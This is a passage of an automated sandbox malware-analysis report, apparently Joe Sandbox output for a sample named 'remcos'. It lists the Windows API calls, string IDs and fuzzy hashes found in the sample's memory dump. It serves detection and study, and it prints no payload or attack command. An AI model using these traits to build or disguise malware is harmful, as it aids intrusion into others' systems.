                                                                • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 003863C4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                 • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleModuleProcVersion
                                                                • String ID: HeapSetInformation$Kernel32.dll
                                                                • API String ID: 3310240892-3460614246
                                                                • Opcode ID: cdb67b04a7edd5dcd8c2c930b4a6a33789f6e11f09bc7d44ffd7a55423274d3d
                                                                • Instruction ID: d9a0201f863cb3d6dabdaffe5cae4b24ca5cfc89eb506ae62dccd980b17638cd
                                                                • Opcode Fuzzy Hash: cdb67b04a7edd5dcd8c2c930b4a6a33789f6e11f09bc7d44ffd7a55423274d3d
                                                                • Instruction Fuzzy Hash: 08E08C74750321ABDEA337726C8FBAF7B4DEB00B92B0144D5B801E25E0DAA0CC0287B4
                                                                APIs
                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00389B4E
                                                                • ?terminate@@YAXXZ.MSVCRT ref: 00389BF7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                 • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: ?terminate@@CurrentImageNonwritable
                                                                • String ID: csm$csm
                                                                • API String ID: 3343398186-3733052814
                                                                • Opcode ID: d5b319959d972a526dd31719fe871fc8f71b4e366bacf776be7c1e7ba5ec3bd6
                                                                • Instruction ID: b040d72ca5266bd9b2d136c2bf0f7da4a6851b6d62908f07bbe530b4c85567c4
                                                                • Opcode Fuzzy Hash: d5b319959d972a526dd31719fe871fc8f71b4e366bacf776be7c1e7ba5ec3bd6
                                                                • Instruction Fuzzy Hash: 0A5190349003189BCF17EF68D8C4ABEBBA9AF44324F1941D6E8159B291D731DD51CB91
                                                                APIs
                                                                • IsCharAlphaNumericW.USER32(?,00000000,00000104,00000000,?,?,?,?,?,00386B65,?,?,?), ref: 0038614F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                 • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: AlphaCharNumeric
                                                                • String ID: "$Property value is too long.$ek8
                                                                • API String ID: 1535711457-3286507774
                                                                • Opcode ID: caacd0f20505f7e5003290c1fbf0ad6b367539cc019a1e801b4a65e1f201e1a1
                                                                • Instruction ID: fd39a6616a236a3f4b05f514146608b3c6b0a3317bbf6513d6ac42295063ad75
                                                                • Opcode Fuzzy Hash: caacd0f20505f7e5003290c1fbf0ad6b367539cc019a1e801b4a65e1f201e1a1
                                                                • Instruction Fuzzy Hash: B741E575E003259BCB21FF69844557AB3F2EFA8710B6588E5D8C1E7285F7348D42C350
                                                                APIs
                                                                • LoadLibraryW.KERNEL32(Msi.dll), ref: 00383D10
                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00383D29
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                 • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: DllGetClassObject$Msi.dll
                                                                • API String ID: 2574300362-3279299384
                                                                • Opcode ID: 404ac4e73c1766469d463878c6cdc1dcece33039485b5c8df46a745c98716efb
                                                                • Instruction ID: eca4b0dde0d6d01311ca45c25c31480fffd82182b4ca1b23336d44183b1448d9
                                                                • Opcode Fuzzy Hash: 404ac4e73c1766469d463878c6cdc1dcece33039485b5c8df46a745c98716efb
                                                                • Instruction Fuzzy Hash: 10312C35A50314AFCB06EB69DC54D5EB7ACFF48720B1144D9E806E33A0DA70AE018B60
                                                                APIs
                                                                • LoadLibraryW.KERNEL32(Msi.dll,00000000,00000000,?,?,?,003876B2), ref: 00383E19
                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00383E2E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                 • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: DllGetClassObject$Msi.dll
                                                                • API String ID: 2574300362-3279299384
                                                                • Opcode ID: b21591fa66e03df0daab91c0df5647511b016a8a2e319089f2edf260b1f274cf
                                                                • Instruction ID: 8c33025af9a3239b47e93a5d0c34a5f0bb0a38491c4a4df0b574842f008f05b9
                                                                • Opcode Fuzzy Hash: b21591fa66e03df0daab91c0df5647511b016a8a2e319089f2edf260b1f274cf
                                                                • Instruction Fuzzy Hash: BF113076A50715AFDB12EB64DC58E6A77ACEB08755F0144D8F801E3290E770EE018BA0
                                                                APIs
                                                                • Sleep.KERNEL32(0000000A), ref: 00388A77
                                                                • LoadLibraryW.KERNEL32(COMCTL32), ref: 00388AA1
                                                                • GetProcAddress.KERNEL32(?), ref: 00388AC1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                 • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProcSleep
                                                                • String ID: COMCTL32
                                                                • API String ID: 188063004-3719691325
                                                                • Opcode ID: 8b3843b43c9c9c5802d5415010179d65671f71dac30d03d4c166a28a817fc976
                                                                • Instruction ID: 6861c212a6c9cb11240eec9efa37183e4e54a1fb2b21d5396c8bfcda466ecd21
                                                                • Opcode Fuzzy Hash: 8b3843b43c9c9c5802d5415010179d65671f71dac30d03d4c166a28a817fc976
                                                                • Instruction Fuzzy Hash: 06019E72614351ABE71BBB3A9C19A263AA9EB81350F0944FAE941D7290EA74CC0187A0
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                 • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: memcpy
                                                                • String ID: `
                                                                • API String ID: 3510742995-2679148245
                                                                • Opcode ID: 22cc49c760ed817d82a9f6d9a9af561a998335de2e3d08d25fca75c9c41e2a2f
                                                                • Instruction ID: ae63affb25c873d7b64662f147240c81a9b8a2aa2426dd79857e947a36916e71
                                                                • Opcode Fuzzy Hash: 22cc49c760ed817d82a9f6d9a9af561a998335de2e3d08d25fca75c9c41e2a2f
                                                                • Instruction Fuzzy Hash: A351AAB2A04325EFCF15EFA8C8865AEB7B5FF48310B164595E914DB380E771AE40C7A4
                                                                APIs
                                                                • lstrcmpW.KERNEL32(?,003813CC,?,mewuifsoarpcvxgh!), ref: 00384A83
                                                                • lstrcmpW.KERNEL32(?,003813D0,?,mewuifsoarpcvxgh!), ref: 00384A93
                                                                • lstrcmpW.KERNEL32(?,003813D8,?,mewuifsoarpcvxgh!), ref: 00384AA3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                 • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: lstrcmp
                                                                • String ID: mewuifsoarpcvxgh!
                                                                • API String ID: 1534048567-2729521250
                                                                • Opcode ID: cd474f887e15e071c6d60bc2f98d87ecdee51958f564ed9a9637ea98bf660c7e
                                                                • Instruction ID: 9fcd46b1e90c57ea4976bfe7d45f0388565ba60bd9cc50128626c2eef113f8c8
                                                                • Opcode Fuzzy Hash: cd474f887e15e071c6d60bc2f98d87ecdee51958f564ed9a9637ea98bf660c7e
                                                                • Instruction Fuzzy Hash: 0641F735B50316ABDB26FFB5E880BAEB3B8EF44710F1540A6E901EB690E7748D41C354
                                                                APIs
                                                                  • Part of subcall function 00389C98: GetModuleHandleW.KERNEL32(00000000), ref: 00389C9F
                                                                • __set_app_type.MSVCRT ref: 00389292
                                                                • __p__fmode.MSVCRT ref: 003892A8
                                                                • __p__commode.MSVCRT ref: 003892B6
                                                                • __setusermatherr.MSVCRT ref: 003892D7
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                 • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                • String ID:
                                                                • API String ID: 1632413811-0
                                                                • Opcode ID: b6bc552813e5b9e9613844d68a31328a9b75a593b282de7d09351682fdb998f0
                                                                • Instruction ID: 75a82ddec68c315e13676ae22066aaf8f20f6037d3ab41908b71a48c1d6dbafe
                                                                • Opcode Fuzzy Hash: b6bc552813e5b9e9613844d68a31328a9b75a593b282de7d09351682fdb998f0
                                                                • Instruction Fuzzy Hash: A7F0F8B0014304DFD757BB31EC0E6283B69BB05371F1416DAE4628A2E0CB368080CB20
                                                                APIs
                                                                • StgOpenStorage.OLE32(?,00000000,00000020,00000000,00000000,?), ref: 00383F75
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                 • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: OpenStorage
                                                                • String ID: &
                                                                • API String ID: 222319337-1010288
                                                                • Opcode ID: 7eeb890de045ebc51f227c9c538a4044d6459d72c4507a1f2e58460097ff73b1
                                                                • Instruction ID: 90d4e7eedc4c0cba928cff501886b36ed809dbe5c7e08a2ab3416ae53962ae4f
                                                                • Opcode Fuzzy Hash: 7eeb890de045ebc51f227c9c538a4044d6459d72c4507a1f2e58460097ff73b1
                                                                • Instruction Fuzzy Hash: 2C912870A10219AFDB15EFA4DD98E6EB7BDFF14314B0445A8F516E7690DB20BD44CB20
                                                                APIs
                                                                • Sleep.KERNEL32(0000000A), ref: 003888D6
                                                                • GetProcAddress.KERNEL32(?), ref: 0038891F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                 • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: AddressProcSleep
                                                                • String ID: OLE32
                                                                • API String ID: 1175476452-2276369563
                                                                • Opcode ID: 42b67e6fbb1e0a4547c4be98de4e3958468144433e5c5a33d53539ec4714731f
                                                                • Instruction ID: 93b7a504c9455b200d363e2043ee58798ab7610ec24a46bf7718826069b5f638
                                                                • Opcode Fuzzy Hash: 42b67e6fbb1e0a4547c4be98de4e3958468144433e5c5a33d53539ec4714731f
                                                                • Instruction Fuzzy Hash: 8A01B172614351ABDB1BBB35AC1A6263AECEB85350F4504FDD541C7290EFB0DC00C761
                                                                APIs
                                                                • Sleep.KERNEL32(0000000A), ref: 00388D70
                                                                • GetProcAddress.KERNEL32(?), ref: 00388DB9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                 • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: AddressProcSleep
                                                                • String ID: KERNEL32
                                                                • API String ID: 1175476452-1217789123
APIs
• RegOpenKeyExW.ADVAPI32(80000002,Software\Policies\Microsoft\Windows\Installer,00000000,00020019,HZ8,?,00385A48,?,?,?), ref: 00382F8B
Strings
• HZ8, xrefs: 00382F7F
• Software\Policies\Microsoft\Windows\Installer, xrefs: 00382F85
Memory Dump Source
• Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
• Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_380000_remcos.jbxd
Similarity
• API ID: Open
• String ID: HZ8$Software\Policies\Microsoft\Windows\Installer
• API String ID: 71445658-1056301759